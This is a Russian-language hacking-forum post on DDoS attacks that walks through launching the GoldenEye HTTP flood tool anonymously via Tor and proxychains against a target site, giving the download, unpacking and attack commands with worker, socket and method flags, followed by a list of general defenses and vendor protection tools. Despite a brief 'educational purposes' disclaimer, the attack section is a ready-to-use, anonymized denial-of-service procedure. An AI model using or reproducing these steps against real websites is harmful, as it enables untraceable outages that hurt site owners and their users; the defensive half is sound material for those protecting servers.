Отказ от обслуживания. Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты

Admin

Администратор
DDOS

Кратко о «Дудосе»
Что это такое?

Википедия гласит:

DDoS (аббр. англ. Distributed Denial of Service, дословно «Распределенный отказ в обслуживании») — хакерская атака на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых добросовестные пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён.
Как работает данная атака и кто ею пользуется?

У каждого веб-сервера имеются ограничения по количеству запросов, которые веб-сервер может может обслуживать одновременно. Если количество запросов будет превышать допустимую норму — вполне возможно следующее:

  1. Замедление работы сервера (замедление обработки запросов)
  2. Полный отказ в обслуживании запросов
Чаще всего злоумышленники добиваются второго — полного отказа в обслуживании. Мотивы могут быть разными: начиная с защиты пользователей от мошеннических сайтов и заканчивая банальной скукой.

Но следует сказать, что пользуются данными атаками не только злоумышленники, но и «белые хакеры», т.е. пентестеры. Этой атакой этичные хакеры тестируют веб-сервера на мощность и способность обрабатывать большое количество запросов одновременно.

Работает DDoS так: злоумышленник создает сеть из «зомби-компьютеров» (на самом деле это не обязательно компьютеры: годными для данной атаки являются все устройства, способные отправлять запросы), и впоследствии использует эту сеть для проведения атаки.

Представим ситуацию: максимальный вес трафика, который может принимать сервер — 1 Гб. Злоумышленник пытается достичь или преодолеть этот барьер. Если получается — сервер сначала тормозит, а потом может и лечь.

Теперь самое интересное: как провести подобную атаку? Сразу предупредим — все, описанное и рассказанное ниже предоставлено лишь в ознакомительных целях. Чужие сервера ломать нельзя, за это могут быть проблемы законом. Мы тебя предупредили.
Необходимые инструменты
  1. EtherApe - графический монитор сети, который графически отображает сетевую активность. Хосты и ссылки меняются в размере с трафиком. Отображение цветовых протоколов.
  2. Service Tor - Tor позволяет клиентам и ретрансляторам предлагать скрытые услуги. То есть вы можете предложить веб-сервер, SSH-сервер и т.д. Не раскрывая свой IP-адрес своим пользователям.
  3. Proxychains - последняя версия Proxychains поддерживает SOCKS5, SOCKS4 и HTTP CONNECT. Прокси-цепи можно смешивать с разными типами прокси.
  4. GoldenEye - GoldenEye - приложение на python, предназначенное только для целей тестирования безопасности.
Как выполнить DDOS атаку на сайт?
1. Запустите etherape: etherape, появится всплывающее окно, которое графически отображает сетевую активность.

2. Запустите службу TOR:

service tor start

3. Загрузите Goldeneye

https://github.com/jseidl/GoldenEye
wget https://github.com/jseidl/GoldenEye

4. После загрузки распакуйте его в папку

unzip GoldenEye-master.zip

5. Начать атаку

/GoldenEye-master# proxychains ./goldeneye.py http://testdomain.com

b7979bfffbe78d61550fa.png

  • Добавьте значения для рабочих (-w), сокетов (-s) и метода (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post

Если вы не остановите атаку, то в некоторых случаях она "взорвется". Чтобы остановить атаку просто нажмите CTRL+C.
Готово. Через какое-то время сервер будет тормозить, а затем, возможно, ляжет.

Общая защита от DDOS-атаки
  • Снижение скорости IP-соединения.
  • Используйте IDS, межсетевые экраны веб-приложений.
  • Tweak Connection на порог IP.
  • Защитите свои DNS-серверы.
  • Установите средства защиты. Убедитесь, что у вас установлены соответствующие средства защиты как для ваших сетей, так и для ваших приложений. Сюда входят такие ключевые инструменты, как брандмауэры, программное обеспечение для мониторинга сети и антивирусные программы, а также системы мониторинга угроз. С их помощью вы можете отслеживать базовый сетевой трафик и настраивать оповещения о необычном поведении.
  • Держите все в курсе. Все эти системы должны быть обновлены, чтобы гарантировать, что любые ошибки или проблемы исправлены. Обнаружение угроз как можно раньше - лучший способ предотвратить атаку DDoS-атак на важные сетевые инфраструктуры и повлиять на конечных пользователей.
Инструменты для предотвращения DDoS-атак
Есть несколько инструментов, которые я рекомендую для предотвращения и остановки DDoS-атак.

1. Security Event Manager
Для отслеживания поведения сети и маркировки угроз до того, как они станут чрезмерными, мне нравится SolarWinds Security Event Manager (SEM).

e046e9efad1df39cab843.png

Способность быстро реагировать на угрозу жизненно необходима, поскольку инициативы в области безопасности могут быстро стать бесполезными, если их развертывание займет слишком много времени. SEM включает в себя автоматические ответы, которые могут блокировать подозрительный IP или USB, отключать вредоносные устройства или отключать их привилегии, а также уничтожать приложения, которые ведут себя неожиданным образом. Это означает, что задержки при работе с чем-то вроде атаки DDoS сводятся к минимуму.

SEM также контролирует целостность файлов и USB, поэтому, если что-то выглядит не так, его можно остановить.

SolarWinds SEM предлагается бесплатно для тридцатидневной пробной версии. После этого вы можете посмотреть цены для каждого узла.

2. Cloudflare
4327ae5bb701daea85ff1.png

Cloudflare предлагает гибкий и масштабируемый инструмент, который объединяет несколько методов предотвращения DDoS в одном решении. Он предотвращает проникновение вредоносного и злонамеренного трафика в вашу сеть, а остальная часть сети остается функциональной и высокопроизводительной. Cloudflare использует базу данных репутации для отслеживания потенциальных угроз от злоумышленников.

Для предприятий Cloudflare стоит 200 долларов США в месяц, но на уровне предприятия вам необходимо связаться с Cloudflare для получения расценок.

3. Imperva
51a064bf9a360e03e6165.png

Средство защиты Imperva DDoS защищает всю сеть и защищает от атак с помощью обработки пакетов большой емкости. Он обеспечивает защиту от DDoS-атак как всегда, так и по требованию, в зависимости от того, что больше всего подходит вашему бизнесу, а также включает в себя автоматическое обновление панелей мониторинга, отображающих информацию о трафике атак. Основным недостатком инструмента Imperva является то, что он ограничен защитой от DDoS-атак.
 

Вложения

  • 1579953569920.png
    1579953569920.png
    53.8 КБ · Просмотры: 19
Последнее редактирование:
Похожие темы
Admin Интересно Крупные технологические компании игнорируют запросы на отказ от отслеживания. Новости в сети 0
Admin Интересно Отказ от KeePassXC и поддержка современного железа в Tails 7.6. Новости в сети 0
Support81 Отказ от брендов: новые тенденции кибервымогателей Новости в сети 0
Support81 Запрет на выплаты вымогателям: как отказ от выкупа усилит атаки на критическую инфраструктуру Новости в сети 0
Admin Интересно Критическая уязвимость в Apache HTTP/2 позволяет выполнить удалённый код и вызвать отказ в обслуживании. Новости в сети 0
Admin Интересно Пентагон внес ИИ-компанию в чёрный список за отказ сделать ИИ опаснее. Новости в сети 0
L Интересно Google пропустил мошенническую рекламу, а реальная крипто-компания получила отказ Новости в сети 0
devqp Статья Эффективные методы построения лояльной команды: от НЛП до ситуационного контроля Полезные статьи 0
Admin UFOLABSNEWS Детектор ИИ от Meta пропустил 55% созданных им же изображений. Новости в сети 0
Admin UFOLABSNEWS Великобритания внедрит искусственный интеллект для защиты от кибератак. Новости в сети 0
devqp Статья Эффективные методы защиты от утечки геолокации в сети Анонимность и приватность 0
devqp Статья Полное руководство по цифровой анонимности и защите от деанонимизации Анонимность и приватность 0
Admin UFOLABSNEWS Биологи обсуждают способность выбирать как ключевое отличие живого от неживого. Новости в сети 0
Admin UFOLABSNEWS Meta разрабатывает собственный чип для искусственного интеллекта, чтобы снизить зависимость от Nvidia и сократить расходы. Новости в сети 0
Admin UFOLABSNEWS CrankGPT: нейросеть, работающая от ручного генератора. Новости в сети 0
Admin UFOLABSNEWS Житель Барнаула получил 16 тысяч звонков от мошенников за полгода. Новости в сети 0
Admin UFOLABSNEWS GitHub Copilot обходит защиту от вредоносных запросов при написании кода. Новости в сети 0
Admin UFOLABSNEWS Луна медленно удаляется от Земли, а Солнце стареет — что ждёт нашу планету через миллиарды лет. Новости в сети 0
Admin UFOLABSNEWS Фишинговая кампания имитирует собеседования от известных брендов для кражи данных Google. Новости в сети 0
Admin UFOLABSNEWS Учёные зафиксировали возможный сигнал от первых звёзд Вселенной. Новости в сети 0
Admin UFOLABSNEWS Зонд «Вояджер-1» приближается к отметке в один световой день от Земли. Новости в сети 0
devqp Статья 10 главных уроков социальной инженерии от Кевина Митника Фишинг, мошенничество, СИ 0
Admin UFOLABSNEWS Opera представила функцию Paste Protect для защиты от атак ClickFix. Новости в сети 0
Admin UFOLABSNEWS Австрия предложила разместить Anthropic в ЕС для снижения зависимости от США. Новости в сети 0
Admin UFOLABSNEWS От мешков с песком до кубического километра льда: как физики ловят самую неуловимую частицу во Вселенной. Новости в сети 0
Admin UFOLABSNEWS Правительство США одобрило ограниченный выпуск модели Mythos 5 от Anthropic. Новости в сети 0
Admin UFOLABSNEWS Сеть Tor откажется от устаревших версий с 1 сентября 2026 года. Новости в сети 0
Admin UFOLABSNEWS Министерство юстиции США конфисковало облачный аккаунт, связанный с отмыванием денег от кибермошенничества. Новости в сети 0
Admin UFOLABSNEWS Растения задохнутся от чистого воздуха. Ученые обещают Земле жестокое углеродное голодание. Новости в сети 0
Admin UFOLABSNEWS GitHub вводит ограничения на количество pull request от сторонних разработчиков. Новости в сети 0
Admin UFOLABSNEWS Плагины WordPress от ShapedPlugin были скомпрометированы в атаке на цепочку поставок. Новости в сети 0
Admin UFOLABSNEWS Ландшафт киберугроз: от модного термина к рабочему инструменту. Новости в сети 0
Admin UFOLABSNEWS Физики обнаружили механизм, защищающий спутники от опасных электронов. Новости в сети 0
Admin Интересно Защита устаревших систем операционных технологий от современных киберугроз. Новости в сети 0
Admin Интересно Сколько элементарных частиц существует в природе: от 17 до 995,5. Новости в сети 0
Admin Интересно Китайский лунный модуль отличается от американского подходом к отказоустойчивости. Новости в сети 0
Admin Интересно Более 73 тысяч аккаунтов пострадали от утечки данных на платформе Tchap. Новости в сети 0
Admin Интересно ИИ от Google DeepMind находит слабые места у неизлечимых болезней. Новости в сети 0
Admin Интересно Российский бизнес усиливает защиту от внутренних угроз. Новости в сети 0
Admin Интересно Евросоюз потребовал от Meta открыть WhatsApp для чат-ботов конкурентов. Новости в сети 0
Admin Интересно Европа массово отказывается от американских технологий. Новости в сети 0
Admin Интересно Идеальные лица и выдуманные жизни. Соцсети наводнили синтетические блогеры, которых невозможно отличить от живых людей. Новости в сети 0
Admin Интересно Хактивисты перешли от идеологии к вымогательству. Новости в сети 0
Admin Интересно Visual Studio Code внедряет двухчасовую задержку обновления расширений для защиты от угроз. Новости в сети 0
Admin Интересно Золотой VPN и изоляция от мира. К чему привела новая государственная политика контроля сетей. Новости в сети 0
Berude EV Code Signing Certificate от компаний Comodo, GlobalSign, Sectigo, Digicert. Вирусология: malware, крипторы, эксплойты 0
Admin Интересно Инженеры разработали технологию LAST для защиты SSD от программ-вымогателей. Новости в сети 0
Admin Интересно Microsoft отказалась от преследования исследователей за уязвимости. Новости в сети 0
Admin Интересно Пользователи Android могут получить выплату от Google в размере $135 млн. Новости в сети 0
Admin Интересно Тест-драйв: как избавиться от сомнений в выборе ИБ-решения за 7 дней. Новости в сети 0

Название темы